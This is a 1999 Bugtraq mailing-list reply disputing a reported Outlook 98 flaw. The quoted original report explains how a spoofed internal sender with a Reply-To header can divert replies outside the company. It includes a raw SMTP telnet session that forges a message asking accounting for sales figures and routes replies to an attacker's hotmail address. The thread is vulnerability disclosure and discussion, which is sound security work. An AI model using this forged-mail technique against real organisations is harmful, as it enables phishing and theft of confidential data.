[10421] in bugtraq
Re: Outlook 98 allows spoofing internal users
daemon@ATHENA.MIT.EDU (Sebastian Schreiber)
Mon May 3 19:30:15 1999
Mime-Version: 1.0
Content-Type: text/plain; charset=iso-8859-1
Content-Transfer-Encoding: QUOTED-PRINTABLE
Message-Id: <19990502214139.A3918@zxmiu07.extern.uni-tuebingen.de>
Date: Sun, 2 May 1999 21:41:39 +0200
Reply-To: Sebastian.Schreiber@gmx.net
From: Sebastian Schreiber <Sebastian.Schreiber@STUDENT.UNI-TUEBINGEN.DE>
X-To: Nate Lawson <nate@root.org>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To: <Pine.BSF.3.96.990420145919.11372A-100000@root.org>; from Nate
Lawson on Tue, Apr 20, 1999 at 03:10:05PM -0700
Hi Nate,
I was not able to reproduce the exploit that you reported to the
bugtraq mailing list. Outlook98 did exactly what I expected: when I
open the mail, I see the "From:"-header in the message. When I reply
to the email, Outlook takes the "Reply-To:"-address of the
header. Which version of Outlook did you test?
Best Regards, Sebastian
PS: your "quick script" has a little bug: the header entry should be
"Reply-To:" instead of "Reply To:".
Nate Lawson <nate@root.org> wrote:
> Problem: Outlook uses a sender's Reply-To address silently, allowing
> a user to inadvertently send data to an Internet mail accoun=
t
> when intending to reply to an internal, trusted user.
>
> Impact: Anyone on the Internet can spoof a trusted internal Exchange =
user
> and get replies sent back to themself without the user knowin=
g they
> weren't responding to another internal user.
>
> How to reproduce:
>
> 1. Spoof mail as an internal user with a Reply-To address claiming t=
o be
> an internal user, but an address of an Internet account, say hotm=
ail.
> 2. Go into Outlook and read the mail. The mail looks like it was in=
ternally
> generated but viewing the full Internet headers under View->Optio=
ns
> shows the bogus Reply-To header.
> 3. Hit Reply in Outlook. The To: field looks like it's going to a v=
alid
> internal user, but right clicking on it and choosing Properties s=
hows
> that the internal user it is sending the reply to is actually an =
Internet
> address.
> 4. Enter some text and hit Send. Observe that the mail went to the =
attacker's
> account, not the internal one.
>
> A quick script:
>
> {root 5:00pm} ~> telnet mail.example.com 25
> Trying 10.20.2.5...
> Connected to mail.example.com.
> Escape character is '^]'.
> 220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail S=
ervice 5.5.2448.0) ready
> helo losebag
> 250 OK
> mail from:<>
> 250 OK - mail from <>
> rcpt to:<accounting@example.com>
> 250 OK - Recipient <accounting@example.com>
> data
> 354 Send data. End with CRLF.CRLF
> From: Nate Lawson
> To: Accounting
> Reply To: Nate Lawson<intruder@hotmail.com>
> Subject: important!
>
> Please reply with the latest copy of our sales figures!
>
> Thanks,
> Nate
> .
> 250 OK
> quit
> 221 closing connection
> Connection closed by foreign host.
>
> Now, a reply to the email will go not to the trusted internal user Na=
te
> Lawson <nlawson@example.com> but to the attacker, <intruder@hotmail.c=
om>.
> Worse, the user sees no indication that the mail is outward-bound! T=
he
> To: field on the reply simply shows "Nate Lawson", a valid internal u=
ser.
>
> Affected programs: Only tested on Outlook 98
>
> Known use of this bug to get confidential information: none yet
>
> Suggested Fix: always show the full email address of any recipient th=
at is
> not local (i.e. username@example.com would be hidden but any instance=
of
> user@hotmail.com would be shown)
>
> Microsoft has been notified, but claimed this was a weakness in SMTP =
and
> would not be fixed until a secure successor to SMTP is implemented. T=
hey
> obviouly missed the point -- the error is not in that mail can be for=
ged,
> but that Outlook allows a user to respond to a message that looks loc=
al
> and legitimate, but is actually destined for an outside address.
>
> -Nate
--
-- What's a letter? Is it like E-mail? ((o)(o))
|---------------------------------------------------ooOo-( )-oOoo-|
| Sebastian Schreiber, Burgholzweg 36, 72070 T=FCbingen ( ) |
| Germany, Voice: ++49 (0)7071 49570 ( ) |
| GSM: 0049-173-3502725 (..) |
|------------------------------------------------------------------|
Key fingerprint =3D 3F F5 D5 E0 0A 59 A5 C4 E7 4F 2B EA 7D 83 89 98
